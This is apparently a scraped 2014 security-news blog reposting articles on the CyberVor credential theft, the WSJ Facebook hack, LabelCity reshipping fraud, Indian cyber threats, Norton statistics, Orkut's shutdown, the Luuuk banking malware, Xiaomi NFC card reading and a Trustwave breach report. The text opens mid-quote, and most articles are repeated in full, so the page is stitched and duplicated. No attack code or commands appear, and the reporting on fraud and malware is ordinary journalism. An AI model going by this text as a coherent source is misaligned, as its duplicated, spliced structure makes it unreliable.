"With hundreds of thousands of sites affected, the list includes many leaders in virtually all industries across the world, as well as a multitude of small or even personal websites."
These databases were used to attack e-mail providers, social media, and other websites to distribute spam to victims and install malicious redirections on legitimate systems”
Hold Security
The New York Times, which first reported the findings, said that on its request "a security expert not affiliated with Hold Security analysed the database of stolen credentials and confirmed it was authentic".
"Another computer crime expert who had reviewed the data, but was not allowed to discuss it publicly, said some big companies were aware that their records were among the stolen information," the paper said.
The paper added: "Hold Security would not name the victims, citing nondisclosure agreements and a reluctance to name companies whose sites remained vulnerable."
The Wall Street Journal later revealed that Hold intended to offer website owners the ability to check whether they had been affected, but only if they paid a fee.
The firm initially posted a message on its site saying it would charge $120 (£71) a month for the "breach notification service", however the details have since been replaced with a message saying "coming soon!".
Multi-pronged attack?
Hold Security, which has previously reported about hacks on Adobe and Target, said it took more than seven months of research to discover the extent of the latest hack.
The firm claimed the gang initially acquired databases of stolen credentials from fellow hackers on the black market.
"These databases were used to attack e-mail providers, social media, and other websites to distribute spam to victims and install malicious redirections on legitimate systems," Hold Security said.
The hackers also got access to data from botnets - a network of computers infected with malware to trigger online fraud.
Hold Security said the botnets helped the hacking group - which it dubbed CyberVor - identify more than 400,000 websites that were vulnerable to cyber attacks.
"The CyberVors used these vulnerabilities to steal data from these sites' databases," the firm said.
"To the best of our knowledge, they mostly focused on stealing credentials, eventually ending up with the largest cache of stolen personal information, totalling over 1.2 billion unique sets of e-mails and passwords."
Read more at: http://www.bbc.com/news/technology-28654613
Wall Street Journal’s Facebook Page Hacked
On July 21, the Journal confirmed that its Facebook account was hacked and false comments posted. "We are aware that our Facebook page was compromised," the newspaper said. "We have deleted the posts and are looking into it."
The Journal confirmed to Information Security Media Group that the unauthorized postings to its Facebook page were due to a compromise of a third-party account. "We acted quickly to remove the erroneous material and have reset affected accounts," according to a statement from the newspaper.
What's At Stake?
The incident highlights the many risks of a corporate social media account takeover, says Nikki Junker, communications and media manager at the Identity Theft Resource Center. "These risks range from damage to a brand's reputation to global financial impact, as was seen in the hacking of an Associated Press Twitter account last year," which caused the Dow Jones Industrial Average to drop 143 points, she says (see: Social Media Needs 2-Factor Authentication).
Shirley Inscoe, a security analyst at consultancy Aite Group, says the attack could have been a test to see if the hackers could post the false items successfully and how long it would take to be removed. "Media and social websites need to be much more security conscious than they have proven to be to date," she says.
It's important to take advantage of two-factor authentication offered by many social networks, Junker says. "You can set both your Twitter and Facebook accounts to send you a text message with a verification code which must be entered in order to log-in to an account," she says. "While it may take a bit of extra time, it can help prevent serious problems for your organization."
Hacker's White Label Money Laundering Services
Laundering the spoils from cybercrime can be a dicey affair, fraught with unreliable middlemen and dodgy, high-priced services that take a huge cut of the action. But large-scale cybercrime operations can avoid these snares and become much more profitable when they’re able to disguise their operations as legitimate businesses operating in the United States, and increasingly they are doing just that.
The typical process of “cashing out” stolen credit card accounts
Today’s post looks at one such evolution in a type of service marketed to cybercrooks that has traditionally been perhaps the most common way that thieves overseas “cash out” cybercrimes committed against American and European businesses, banks and consumers: The reshipping of goods purchased through stolen credit cards.
Cybercrooks very often rely on international reshipping services to help move electronics and other goods that are bought with stolen credit cards, shipped abroad, and then sold for cash. Many fraudsters use stolen credit cards to pay for U.S. Postal Service and FedEx shipping labels a.k.a. “black labels” but major shipping providers appear to be getting better at blocking or intercepting packages sent with stolen credit cards (at least according to anecdotal evidence from the cybercrime forums).
As a result, crooks increasingly are turning to a more reliable freight: So-called “white label” shipping services that are paid for with cybercrime-funded bank accounts via phony but seemingly legitimate companies in the United States.
CASHING OUT
In the case of a breach at an online merchant that exposes the card number, expiration and card verification value (CVV), the compromised card numbers typically are used to purchase high-priced electronics at online stores that are known to be “cardable” that is, the stores will ship to an address that is different from the billing address.
In the case of “card present” breaches (such as at those that have hit Target, Neiman Marcus, P.F. Chang’s and others) where attackers use malicious software to compromise cash register transactions and gather data that can be used to fabricate new cards fraudsters employ teams of “runners” who use the card data to create counterfeit cards and buy high-priced merchandise at big box retailers.
In either card-present or card-not-present fraud, one of the most lucrative ways for fraudsters outside of the United States to cash out stolen credit cards is to have carded goods shipped overseas, where electronics and other luxury items typically sell for a much higher price than in the United States.
The hardest step in this whole process is successfully getting the goods out of the United States, because a large percentage of retailers simply refuse to ship to areas like Russia and Ukraine due to high rates of fraud associated with those regions.
Traditionally, fraudsters get around this restriction by turning to reshipping services that rely on “mules,” people in the United States who get recruited to reship packages after responding to work-at-home job scams. These reshipping mules are sent multiple packages containing electronics that have been purchased with stolen credit and debit cards. They’re also sent prepaid and pre-addressed shipping labels, and the mules are responsible for making sure the goods are reshipped quickly and accurately.
Over the past year, however, more and more users of reshipping services advertised in the cybercrime underground have reported problems with a greater share of their packages being intercepted or canceled. Apparently, the shipping companies are getting better at detecting shipping labels that are paid for with stolen credit cards and hijacked accounts.
LABEL CITY
Enter LabelCity, a “white label” service that advertises “corporate rates” for shipping Priority Mail International through the U.S. Postal Service (USPS) rates that come in slightly below the rates that the USPS charges retail on its shipping calculator.
LabelCity’s “corporate” rates for its “white label” USPS International shipping service.
“Our service provides 100% guarantee on delivery of the goods. Return of funds to 30 days,” the proprietor of LabelCity promises in an online advertisement. “We started doing white labels (i.e., cash disbursed-for)! Our labels are made automatically through the admin panel, and automatic replenishment! Our corporate rates will surprise you, minus 15-20% of the price of USPS!”
Services like LabelCity explain why reshipping operations remain among the most popular methods of cashing out many different forms of cybercrime: Buying luxury goods that can be resold overseas at a significant markup amplifies the fraudster’s “profit.”
A slightly redacted ad for LabelCity’s services pimps black and white labels.
Take, for example, the scourge of IRS tax refund fraud, an increasing form of cybercrime that has been documented extensively on this blog. With refund fraud, the IRS is tricked into sending the fraudsters prepaid credit cards that can be used like cash. But rather than merely pulling the cash from those cards out of ATMs all around the world, it makes more sense for the crooks to take that cash and reinvest it into purchasing goods here in the United States that can often sell for twice the purchase price in countries like Russia and Ukraine.
LabelCity is a great reminder that cybercrime is seldom an isolated event or a single-victim crime: Much of it is connected in some way. In most cases, one fraud begets another, and thieves particularly those perpetrating such crimes from across international borders often string together multiple forms of fraud in a bid to extract maximum value from their activities.
The typical process of “cashing out” stolen credit card accounts
Today’s post looks at one such evolution in a type of service marketed to cybercrooks that has traditionally been perhaps the most common way that thieves overseas “cash out” cybercrimes committed against American and European businesses, banks and consumers: The reshipping of goods purchased through stolen credit cards.
Cybercrooks very often rely on international reshipping services to help move electronics and other goods that are bought with stolen credit cards, shipped abroad, and then sold for cash. Many fraudsters use stolen credit cards to pay for U.S. Postal Service and FedEx shipping labels a.k.a. “black labels” but major shipping providers appear to be getting better at blocking or intercepting packages sent with stolen credit cards (at least according to anecdotal evidence from the cybercrime forums).
As a result, crooks increasingly are turning to a more reliable freight: So-called “white label” shipping services that are paid for with cybercrime-funded bank accounts via phony but seemingly legitimate companies in the United States.
CASHING OUT
In the case of a breach at an online merchant that exposes the card number, expiration and card verification value (CVV), the compromised card numbers typically are used to purchase high-priced electronics at online stores that are known to be “cardable” that is, the stores will ship to an address that is different from the billing address.
In the case of “card present” breaches (such as at those that have hit Target, Neiman Marcus, P.F. Chang’s and others) where attackers use malicious software to compromise cash register transactions and gather data that can be used to fabricate new cards fraudsters employ teams of “runners” who use the card data to create counterfeit cards and buy high-priced merchandise at big box retailers.
In either card-present or card-not-present fraud, one of the most lucrative ways for fraudsters outside of the United States to cash out stolen credit cards is to have carded goods shipped overseas, where electronics and other luxury items typically sell for a much higher price than in the United States.
The hardest step in this whole process is successfully getting the goods out of the United States, because a large percentage of retailers simply refuse to ship to areas like Russia and Ukraine due to high rates of fraud associated with those regions.
Traditionally, fraudsters get around this restriction by turning to reshipping services that rely on “mules,” people in the United States who get recruited to reship packages after responding to work-at-home job scams. These reshipping mules are sent multiple packages containing electronics that have been purchased with stolen credit and debit cards. They’re also sent prepaid and pre-addressed shipping labels, and the mules are responsible for making sure the goods are reshipped quickly and accurately.
Over the past year, however, more and more users of reshipping services advertised in the cybercrime underground have reported problems with a greater share of their packages being intercepted or canceled. Apparently, the shipping companies are getting better at detecting shipping labels that are paid for with stolen credit cards and hijacked accounts.
LABEL CITY
Enter LabelCity, a “white label” service that advertises “corporate rates” for shipping Priority Mail International through the U.S. Postal Service (USPS) rates that come in slightly below the rates that the USPS charges retail on its shipping calculator.
LabelCity’s “corporate” rates for its “white label” USPS International shipping service.
“Our service provides 100% guarantee on delivery of the goods. Return of funds to 30 days,” the proprietor of LabelCity promises in an online advertisement. “We started doing white labels (i.e., cash disbursed-for)! Our labels are made automatically through the admin panel, and automatic replenishment! Our corporate rates will surprise you, minus 15-20% of the price of USPS!”
Services like LabelCity explain why reshipping operations remain among the most popular methods of cashing out many different forms of cybercrime: Buying luxury goods that can be resold overseas at a significant markup amplifies the fraudster’s “profit.”
A slightly redacted ad for LabelCity’s services pimps black and white labels.
Take, for example, the scourge of IRS tax refund fraud, an increasing form of cybercrime that has been documented extensively on this blog. With refund fraud, the IRS is tricked into sending the fraudsters prepaid credit cards that can be used like cash. But rather than merely pulling the cash from those cards out of ATMs all around the world, it makes more sense for the crooks to take that cash and reinvest it into purchasing goods here in the United States that can often sell for twice the purchase price in countries like Russia and Ukraine.
LabelCity is a great reminder that cybercrime is seldom an isolated event or a single-victim crime: Much of it is connected in some way. In most cases, one fraud begets another, and thieves particularly those perpetrating such crimes from across international borders often string together multiple forms of fraud in a bid to extract maximum value from their activities.
Thursday, July 10, 2014
Can India defend Cyber Security threats?
India is becoming most vulnerable for cyber attacks like ransomware and spear-phishing has cost Indian individuals and companies some $4 billion According to Symantec’s 2013 Norton Report. A research report found an alarming 136 percent increase in cyber threats and attacks against Indian government organizations and a 126 percent spike in attacks targeting financial services organizations.
Last year brought a marked increase in the frequency of cyber attacks on Indian assets, with government and private infrastructure equally affected. A research report found an alarming 136 percent increase in cyber threats and attacks against Indian government organizations and a 126 percent spike in attacks targeting financial services organizations. According to Symantec’s 2013 Norton Report, by July 2013, sophisticated cyber assaults like ransomware and spear-phishing has cost Indian individuals and companies some $4 billion.
At a time of heightened online breaches phishing, defaced websites, network break-ins, virus attacks the Indian government published its first ever National Cyber Security Policy (NCSP), in early July, 2013.
Cyber attacks:
1. Cyber attacks were reported on the Indian Navy’s Eastern Command systems in June 2012. The Eastern Naval Command oversees the maritime activities in the South China Sea, as well as the development of ballistic missile submarines.
2. On July 12, 2013, just days after the NCSP was released, several high-level officials of the GOI reported their emails had been hacked. A subsequent investigation put the total number of hacked accounts at roughly 12,000, including systems from the Ministry of External Affairs, Ministry of Home Affairs, Defence Research and Development Organisation (DRDO), and the Indo-Tibetan Border Police Force (ITBP). Even the main National Informatics Centre email server, which serves as the nexus for all government departments, was believed to have been affected.
According to the officers from the National Technical Research Organization (NTRO), India’s premier technical intelligence agency under the NSA, believed that the hacks were directed at networks hosting state secrets.
While any number of countries could be after secrets from the foreign and home ministries and DRDO, only one would be interested in ITBP: China, with which India has a long-running boundary dispute. This, along with the PLA’s recent involvement in cross-globe cyber espionage, should be ringing alarm bells in New Delhi. The U.S. recently indicated five People’s Liberation Army officers for hacking and economic espionage, in what is known as the Unit 61398 case. Although Beijing has repeatedly denied state involvement, a 2009 executive summary prepared for the American Congress by Northrop Grumman states that the nature of the malicious software being used was designed to steal data only a nation-state would want, primarily seeking defense-engineering specifications, military operational information, and U.S.-China policy documents.
There are few reports of Pakistan and India indulging in overtly threatening cyber warfare, although in recent times, hacker groups based out of Lahore and Karachi have managed to break into the websites of the Central Bureau of Investigation (CBI) and the Bharat Sanchar Nigam Limited (BSNL), mostly to deface the sites and leave hate mail. However, it is widely speculated that regional terrorist outfits, such as the Indian Mujahideen (IM), make heavy use of social media sites to not only communicate effectively, but also to conduct recruitment drives, all under the government’s nose. Any cyber policy instituted by the GOI will need to actively deal with these issues.
Last year brought a marked increase in the frequency of cyber attacks on Indian assets, with government and private infrastructure equally affected. A research report found an alarming 136 percent increase in cyber threats and attacks against Indian government organizations and a 126 percent spike in attacks targeting financial services organizations. According to Symantec’s 2013 Norton Report, by July 2013, sophisticated cyber assaults like ransomware and spear-phishing has cost Indian individuals and companies some $4 billion.
At a time of heightened online breaches phishing, defaced websites, network break-ins, virus attacks the Indian government published its first ever National Cyber Security Policy (NCSP), in early July, 2013.
Cyber attacks:
1. Cyber attacks were reported on the Indian Navy’s Eastern Command systems in June 2012. The Eastern Naval Command oversees the maritime activities in the South China Sea, as well as the development of ballistic missile submarines.
2. On July 12, 2013, just days after the NCSP was released, several high-level officials of the GOI reported their emails had been hacked. A subsequent investigation put the total number of hacked accounts at roughly 12,000, including systems from the Ministry of External Affairs, Ministry of Home Affairs, Defence Research and Development Organisation (DRDO), and the Indo-Tibetan Border Police Force (ITBP). Even the main National Informatics Centre email server, which serves as the nexus for all government departments, was believed to have been affected.
According to the officers from the National Technical Research Organization (NTRO), India’s premier technical intelligence agency under the NSA, believed that the hacks were directed at networks hosting state secrets.
While any number of countries could be after secrets from the foreign and home ministries and DRDO, only one would be interested in ITBP: China, with which India has a long-running boundary dispute. This, along with the PLA’s recent involvement in cross-globe cyber espionage, should be ringing alarm bells in New Delhi. The U.S. recently indicated five People’s Liberation Army officers for hacking and economic espionage, in what is known as the Unit 61398 case. Although Beijing has repeatedly denied state involvement, a 2009 executive summary prepared for the American Congress by Northrop Grumman states that the nature of the malicious software being used was designed to steal data only a nation-state would want, primarily seeking defense-engineering specifications, military operational information, and U.S.-China policy documents.
There are few reports of Pakistan and India indulging in overtly threatening cyber warfare, although in recent times, hacker groups based out of Lahore and Karachi have managed to break into the websites of the Central Bureau of Investigation (CBI) and the Bharat Sanchar Nigam Limited (BSNL), mostly to deface the sites and leave hate mail. However, it is widely speculated that regional terrorist outfits, such as the Indian Mujahideen (IM), make heavy use of social media sites to not only communicate effectively, but also to conduct recruitment drives, all under the government’s nose. Any cyber policy instituted by the GOI will need to actively deal with these issues.
NORTON REPORT 2013 ON CYBER CRIME
NORTON HAS RELEASED ITS 2013 CYBER SECURITY REPORT AND THIS REPORT COVERS 24 COUNTRIES LIKE:
AUSTRALIA, BRAZIL, CANADA, CHINA, COLOMBIA, DENMARK, FRANCE, GERMANY, INDIA, ITALY, JAPAN, MEXICO, NETHERLANDS, NEW ZEALAND, POLAND, RUSSIA, SAUDI ARABIA, SINGAPORE, SOUTH AFRICA, SWEDEN, TURKEY, UNITED ARAB EMIRATES, UNITED KINGDOM, UNITED STATES OF AMERICA
WHO IS AFFECTED MOST BY CYBERCRIME?
CYBERCRIME VICTIMS MORE LIKELY TO BE: MALE 64% (COMPARED to 58% OF FEMALES)
MILLENNIAL 66% (COMPARED TO 54% OF BABY BOOMERS)
AND:
• MOBILE DEVICE OWNERS – 63%
• SOCIAL NETWORK USERS – 63%
• PUBLIC / UNSECURED WI-FI USERS – 68%
• EMERGING MARKET – 68%
• PARENT OF CHILDREN 8-17 – 65%
HIGHEST NUMBER OF CYBERCRIME VICTIMS FOUND IN:
85% CHINA
77% RUSSIA
73% SOUTH AFRICA
KEY THEMES
TABLET AND SMARTPHONE CONSUMERS LEAVE SECURITY BEHIND ALMOST 1/2 DON’T USE BASIC PRECAUTIONS SUCH AS PASSWORDS, SECURITY SOFTWARE OR BACK UP FILES FOR THEIR MOBILE DEVICE MORE THAN ONE-THIRD HAVE EXPERIENCED MOBILE CYBERCRIME LAST YEAR
THE GLOBAL PRICE TAG OF CONSUMER CYBERCRIME
US$113 BILLION ANNUALLY, COST PER CYBERCRIME VICTIM UP 50 PERCENT
THE SCALE OF CONSUMER CYBERCRIME 1 MILLION+ VICTIMS DAILY, 12 VICTIMS PER SECOND.
READ MORE DETAILED REPORT AT: http://www.yle.fi/tvuutiset/uutiset/upics/liitetiedostot/norton_raportti.pdf
AUSTRALIA, BRAZIL, CANADA, CHINA, COLOMBIA, DENMARK, FRANCE, GERMANY, INDIA, ITALY, JAPAN, MEXICO, NETHERLANDS, NEW ZEALAND, POLAND, RUSSIA, SAUDI ARABIA, SINGAPORE, SOUTH AFRICA, SWEDEN, TURKEY, UNITED ARAB EMIRATES, UNITED KINGDOM, UNITED STATES OF AMERICA
WHO IS AFFECTED MOST BY CYBERCRIME?
CYBERCRIME VICTIMS MORE LIKELY TO BE: MALE 64% (COMPARED to 58% OF FEMALES)
MILLENNIAL 66% (COMPARED TO 54% OF BABY BOOMERS)
AND:
• MOBILE DEVICE OWNERS – 63%
• SOCIAL NETWORK USERS – 63%
• PUBLIC / UNSECURED WI-FI USERS – 68%
• EMERGING MARKET – 68%
• PARENT OF CHILDREN 8-17 – 65%
HIGHEST NUMBER OF CYBERCRIME VICTIMS FOUND IN:
85% CHINA
77% RUSSIA
73% SOUTH AFRICA
KEY THEMES
TABLET AND SMARTPHONE CONSUMERS LEAVE SECURITY BEHIND ALMOST 1/2 DON’T USE BASIC PRECAUTIONS SUCH AS PASSWORDS, SECURITY SOFTWARE OR BACK UP FILES FOR THEIR MOBILE DEVICE MORE THAN ONE-THIRD HAVE EXPERIENCED MOBILE CYBERCRIME LAST YEAR
THE GLOBAL PRICE TAG OF CONSUMER CYBERCRIME
US$113 BILLION ANNUALLY, COST PER CYBERCRIME VICTIM UP 50 PERCENT
THE SCALE OF CONSUMER CYBERCRIME 1 MILLION+ VICTIMS DAILY, 12 VICTIMS PER SECOND.
READ MORE DETAILED REPORT AT: http://www.yle.fi/tvuutiset/uutiset/upics/liitetiedostot/norton_raportti.pdf
Thursday, July 3, 2014
Google shutting down Orkut by September 30
Internet giant Google said it will shut down Orkut, which is popular in India and Brazil, on September 30 2014. The Orkut services did not get more users to compete with other social network sites.
Ten years ago, Orkut was Google’s first foray into social networking. Built as a “20 percent” project, Orkut communities started conversations, and forged connections, that had never existed before. Orkut helped shape life online before people really knew what “social networking” was.
However, according to its website about 50.6 per cent of its users were from Brazil. Another 20.44 per cent came from India, while the US and Pakistan accounted for 17.78 per cent and 0.86 per cent, respectively.
"Over the past decade, YouTube, Blogger and Google+ have taken off, with communities springing up in every corner of the world. Because the growth of these communities has outpaced Orkut's growth, we've decided to bid Orkut farewell," Google said in a post on the Orkut blog.
Orkut was launched in 2004, the same year when Facebook was founded. Facebook is now the world's largest social network with 1.28 billion users.
Orkut was the result of a "20 per cent project" in which Google workers got to spend a fifth of their time on ideas not necessarily related to their job responsibilities.
Google launched its Google+ social network in 2011 and has been slowly weaving it into other services. While Google+ was positioned to compete with Facebook in the beginning, over the last few years, it has established Google+ as a unified "user identity" system.
In 2010, Facebook overtook Orkut as the top social networking site in India with 20.9 million visitors in July that year compared to Orkut's 16 per cent growth with 19.9 million visitors, according to research firm comScore.
Google said it would preserve an archive of all Orkut communities that will be available from September 30.
"If you don't want your posts or name to be included in the community archive, you can remove Orkut permanently from your Google account," Google said.
Read from Orkut blog: http://en.blog.orkut.com/
Ten years ago, Orkut was Google’s first foray into social networking. Built as a “20 percent” project, Orkut communities started conversations, and forged connections, that had never existed before. Orkut helped shape life online before people really knew what “social networking” was.
However, according to its website about 50.6 per cent of its users were from Brazil. Another 20.44 per cent came from India, while the US and Pakistan accounted for 17.78 per cent and 0.86 per cent, respectively.
"Over the past decade, YouTube, Blogger and Google+ have taken off, with communities springing up in every corner of the world. Because the growth of these communities has outpaced Orkut's growth, we've decided to bid Orkut farewell," Google said in a post on the Orkut blog.
Orkut was launched in 2004, the same year when Facebook was founded. Facebook is now the world's largest social network with 1.28 billion users.
Orkut was the result of a "20 per cent project" in which Google workers got to spend a fifth of their time on ideas not necessarily related to their job responsibilities.
Google launched its Google+ social network in 2011 and has been slowly weaving it into other services. While Google+ was positioned to compete with Facebook in the beginning, over the last few years, it has established Google+ as a unified "user identity" system.
In 2010, Facebook overtook Orkut as the top social networking site in India with 20.9 million visitors in July that year compared to Orkut's 16 per cent growth with 19.9 million visitors, according to research firm comScore.
Google said it would preserve an archive of all Orkut communities that will be available from September 30.
"If you don't want your posts or name to be included in the community archive, you can remove Orkut permanently from your Google account," Google said.
Read from Orkut blog: http://en.blog.orkut.com/
Friday, June 27, 2014
Banking malware 'Luuuk' might have stolen $682K in one week
A European bank may have lost as much as $682,000 in a week earlier this year, according to Kaspersky Lab, which analyzed data on a server used in attacks against online banking users in Italy and Turkey.
In a blog post Wednesday, the Russian security company didn't identify the bank or why it chose to reveal the possible theft six months later. The financial institution has been notified of the discovery, and Kaspersky said is in contact with law enforcement.
On Jan. 20, Kaspersky analysts discovered a command-and-control server for a piece of malware that executed so-called man-in-the-browser attacks on victims' computers. In that type of attack, malware intervenes during an online banking session and can manipulate or steal data.
Two days later, the fraudsters removed all of the "sensitive components" from the server, Kaspersky wrote. That indicates the cyber criminals may have known someone else was looking at it.
The fraud campaign was nicknamed "Luuuk" by Kaspersky after that name appeared in a file path of the server's administrator control panel. It appears the server managed the theft of funds from victims' accounts, automatically transferring the money to the accounts of "mules," or people who agree to receive the funds for a cut and transfer the bulk of the funds onward.
Server logs indicated that as much as $682,000 may have been transferred in a single week, wrote Kaspersky's Global Research and Analysis Team. The data indicated around 190 victims. Analysts also saw on the server descriptions of fraudulent transfers and the IBAN (international bank account number) numbers for victims and money mules.
Kaspersky hasn't seen a sample of the actual malware that was on victims' computers. But data on the server indicated it is similar in functionality to the infamous Zeus banking malware.
The Luuuk malware collected the logins and passwords of victims and one-time passcodes. Since one-time passcodes typically expire in a few minutes, this type of banking malware will use the code to quickly log into the victim's account.
The attackers checked the victim's balance and then conducted several fraudulent transactions automatically, likely "in the background of a legitimate banking session," the company wrote.
There are other indicators that the group is still very active, Kaspersky wrote, although it did not give further details.
In a blog post Wednesday, the Russian security company didn't identify the bank or why it chose to reveal the possible theft six months later. The financial institution has been notified of the discovery, and Kaspersky said is in contact with law enforcement.
On Jan. 20, Kaspersky analysts discovered a command-and-control server for a piece of malware that executed so-called man-in-the-browser attacks on victims' computers. In that type of attack, malware intervenes during an online banking session and can manipulate or steal data.
Two days later, the fraudsters removed all of the "sensitive components" from the server, Kaspersky wrote. That indicates the cyber criminals may have known someone else was looking at it.
The fraud campaign was nicknamed "Luuuk" by Kaspersky after that name appeared in a file path of the server's administrator control panel. It appears the server managed the theft of funds from victims' accounts, automatically transferring the money to the accounts of "mules," or people who agree to receive the funds for a cut and transfer the bulk of the funds onward.
Server logs indicated that as much as $682,000 may have been transferred in a single week, wrote Kaspersky's Global Research and Analysis Team. The data indicated around 190 victims. Analysts also saw on the server descriptions of fraudulent transfers and the IBAN (international bank account number) numbers for victims and money mules.
Kaspersky hasn't seen a sample of the actual malware that was on victims' computers. But data on the server indicated it is similar in functionality to the infamous Zeus banking malware.
The Luuuk malware collected the logins and passwords of victims and one-time passcodes. Since one-time passcodes typically expire in a few minutes, this type of banking malware will use the code to quickly log into the victim's account.
The attackers checked the victim's balance and then conducted several fraudulent transactions automatically, likely "in the background of a legitimate banking session," the company wrote.
There are other indicators that the group is still very active, Kaspersky wrote, although it did not give further details.
Friday, June 13, 2014
Chinese smart phone Xiaomi can steal bank card data using NFC
The woman, was surprised by noticing that the data was displayed directly on the display of her device, the data sent to the smartphone included the card number stored in close range and the account’s last 10 transactions with related amounts and locations.
“Feng, who said she had not accessed her bank account on her phone or entered her password, initially thought it may have been the work of spyware, though she soon realized it was an automatic function because her bank card could still be read even after she closed all running applications.” states theWChina Times.
“Near field communication (NFC) is a set of standards for Smartphones and similar devices to establish radio communication with each other by touching them together or bringing them into close proximity. The standard describes a radio technology that allows two devices to communicate at a short distance, no more than a few centimeters, allowing the exchange of information quickly and safely.” I reported in a previous post in NFC standards.
The disconcerting discovery made by the experts in charge of the Yangtse Evening News newspaper is that the Feng’s phone could retrieve details from a microchip bank card automatically in two seconds from within a range of about 10 centimeters.
Now when an attacker pass very close to your wallet in a crowded place, he can steal personal information from bank cards without the victim’s knowledge.
Feng declared to be shocked by the behavior of the Xiaomi smartphone and she believed the company should have warned its customers of this potentially serious security flaw that could expose them to the theft of personal information from bank cards.
“She said when she called customer support she was told that she could simply switch off the NFC function if she had concerns.”
This is really worrying, let’s hope Xiaomi and other manufacturers will consider seriously the NFC security issues.
Wednesday, June 11, 2014
Hackers are not satisfied with payment data
Last year, Trustwave company saw a 33% increase in the data theft of sensitive and confidential information, such as financial credentials, internal communications, personally identifiable information and various customer records. In all, 45% of thefts involved non-payment data, according to the “2014 Trustwave Global Security Report.”
Payment card data the main target for data compromises, but increasingly thieves are starting to go after other types of personal and sensitive data to steal, according to a new report from security firm Trustwave.
Trustwave based the findings in the 123-page report on an analysis of 691 data-breach investigations conducted last year (a 54% increase from 2012), along with threat intelligence from its global security operations, telemetry from security technologies and research.
Without a strong defense mechanism set up almost universally, data thieves will continue to thrive, Trustwave contents.
“A global, thriving underground provides for quick monetization of stolen data no matter where the victim or attacker resides,” the company said in the report. “As long as criminals can make money by stealing data and selling that sensitive information on the black market, we don’t expect data compromises to subside.”
Weak passwords contributed to 31 percent of compromises Trustwave investigated. More than half, 59%, of compromised victims resided in the U.S., 14 percent in the United Kingdom and 11 percent in Australia.
In 2013, eCommerce accounted for 54% of assets targeted by hackers, and point-of-sale breaches accounted for 33 percent of Trustwave’s investigations.
Retail was the top industry compromised, accounting for 35 percent of the attacks investigated. Food and beverage ranked second at 18 percent, hospitality ranked third at 11 percent, and finance ranked fourth at 9 percent.
The median number of days from initial intrusion to detection was 87. Some 71% of all compromised victims did not know they were compromised, though self-detection can shorten to one day from 14 days the timeline from detection to containment when detected by a third party, Trustwave noted in its report. The median number of days from detection to containment was seven.
“Victims that identify a breach on their own detect it sooner and reduce clean-up time by two weeks,” Trustwave said. “A plan will help make your organization aware of a compromise sooner, limit its repercussions and shorten its duration.”
Among the exploits detected, 85% involved third-party plug-ins, including Java applets, Adobe Flash and Adobe Acrobat/Reader. “78% of exploits we detected took advantage of Java vulnerabilities,” Trustwave said in its report.
At 49%, Blackhole topped the list of most prevalent exploit kits. “However, the arrest of its creator and a lack of updates to the kit spurred a 15% decline in Blackhole’s prevalence,” Trustwave said. “We expect the second-most prevalent kit, Magnitude at 31%, to fill the gap.”
Moreover, 96% of applications, and 100% of mobile applications, Trustwave scanned harbored one of more serious security vulnerabilities. Based on attack-source IP addresses, the top three hosting countries for malware last year were the U.S., at 42%; Russia, at 13%; and Germany, at 9%t.
“This may be a result of foreign attackers adapting to businesses blocking connections from foreign IP addresses by compromising other assets within the target country and using them as “jump servers” to launch attacks against primary targets,” Trustwave said.
In the report, Trustwave suggested a few ways to counter breach attacks, including educating staff and employees on the best security practices, enforcing strong authentication policies and practices, assessing data protections across all assets, testing system resilience to attacks, and developing and rehearsing incident response plans.
“Secure all of your data, and don’t lull yourself into a false sense of security just because you think your payment card data is protected,” Trustwave advised. “Assess your entire set of assets from endpoint to network to application to database. Any vulnerability in any asset could lead to the exposure of data.”
Many of the multi-site breaches centered on franchise business models. As such, the information technology used must be strong, Trustwave advised. “Franchisees are often required to deploy information technology defined by the franchisor for efficiency purposes and to simplify management of those environments,” the company noted. “While a well-designed technology template can help to improve security, a poor design can result in a vulnerability present across potentially thousands of locations. If an attacker discovers and takes advantage of a flaw at one franchise, they can replicate the exploit at other locations.”
Payment card data the main target for data compromises, but increasingly thieves are starting to go after other types of personal and sensitive data to steal, according to a new report from security firm Trustwave.
Trustwave based the findings in the 123-page report on an analysis of 691 data-breach investigations conducted last year (a 54% increase from 2012), along with threat intelligence from its global security operations, telemetry from security technologies and research.
Without a strong defense mechanism set up almost universally, data thieves will continue to thrive, Trustwave contents.
“A global, thriving underground provides for quick monetization of stolen data no matter where the victim or attacker resides,” the company said in the report. “As long as criminals can make money by stealing data and selling that sensitive information on the black market, we don’t expect data compromises to subside.”
Weak passwords contributed to 31 percent of compromises Trustwave investigated. More than half, 59%, of compromised victims resided in the U.S., 14 percent in the United Kingdom and 11 percent in Australia.
In 2013, eCommerce accounted for 54% of assets targeted by hackers, and point-of-sale breaches accounted for 33 percent of Trustwave’s investigations.
Retail was the top industry compromised, accounting for 35 percent of the attacks investigated. Food and beverage ranked second at 18 percent, hospitality ranked third at 11 percent, and finance ranked fourth at 9 percent.
The median number of days from initial intrusion to detection was 87. Some 71% of all compromised victims did not know they were compromised, though self-detection can shorten to one day from 14 days the timeline from detection to containment when detected by a third party, Trustwave noted in its report. The median number of days from detection to containment was seven.
“Victims that identify a breach on their own detect it sooner and reduce clean-up time by two weeks,” Trustwave said. “A plan will help make your organization aware of a compromise sooner, limit its repercussions and shorten its duration.”
Among the exploits detected, 85% involved third-party plug-ins, including Java applets, Adobe Flash and Adobe Acrobat/Reader. “78% of exploits we detected took advantage of Java vulnerabilities,” Trustwave said in its report.
At 49%, Blackhole topped the list of most prevalent exploit kits. “However, the arrest of its creator and a lack of updates to the kit spurred a 15% decline in Blackhole’s prevalence,” Trustwave said. “We expect the second-most prevalent kit, Magnitude at 31%, to fill the gap.”
Moreover, 96% of applications, and 100% of mobile applications, Trustwave scanned harbored one of more serious security vulnerabilities. Based on attack-source IP addresses, the top three hosting countries for malware last year were the U.S., at 42%; Russia, at 13%; and Germany, at 9%t.
“This may be a result of foreign attackers adapting to businesses blocking connections from foreign IP addresses by compromising other assets within the target country and using them as “jump servers” to launch attacks against primary targets,” Trustwave said.
In the report, Trustwave suggested a few ways to counter breach attacks, including educating staff and employees on the best security practices, enforcing strong authentication policies and practices, assessing data protections across all assets, testing system resilience to attacks, and developing and rehearsing incident response plans.
“Secure all of your data, and don’t lull yourself into a false sense of security just because you think your payment card data is protected,” Trustwave advised. “Assess your entire set of assets from endpoint to network to application to database. Any vulnerability in any asset could lead to the exposure of data.”
